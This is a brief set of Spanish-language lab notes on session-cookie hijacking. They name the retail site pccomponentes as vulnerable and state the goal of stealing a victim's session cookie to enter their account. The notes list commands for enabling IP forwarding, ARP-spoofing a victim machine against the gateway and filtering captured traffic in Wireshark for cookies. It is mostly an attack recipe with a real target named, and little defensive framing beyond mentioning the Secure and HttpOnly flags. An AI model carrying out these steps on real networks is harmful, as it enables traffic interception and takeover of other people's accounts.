Hijacking (cookie)

Las paginas seguras deben contener (Secure Flag y HTTP only)

Ejemplos:


  dx.com -> no es vulnerable
  
  pccomponentes -> vulnerable
  
	

Objetivo. Cuando nuestra victima se loguea un pccomponentes podemos obtener la cookie de sesión y con ella entrar en la cuenta de pccomponentes con los datos de la victima. El usuario debe estar navegando en pccomponentes, sino se sale de la sesión y se pierde la cookie.

Victama: XP navegando por pccomponentes (actualizar de vez en cuando para no perder la sesión)

Desde KALI:

Activamos el man-in-the-middle:


  echo 1 > /proc/sys/net/ipv4/ip_forward
  arpspoof -i eth0 -t 10.0.2.4 10.0.2.1 -r
  
	

Luego abrimos wireshark para capturar los paquetes


  wireshark
  
	

Comenzamos la captura de paquetes y filtramos por:


  http constains cookie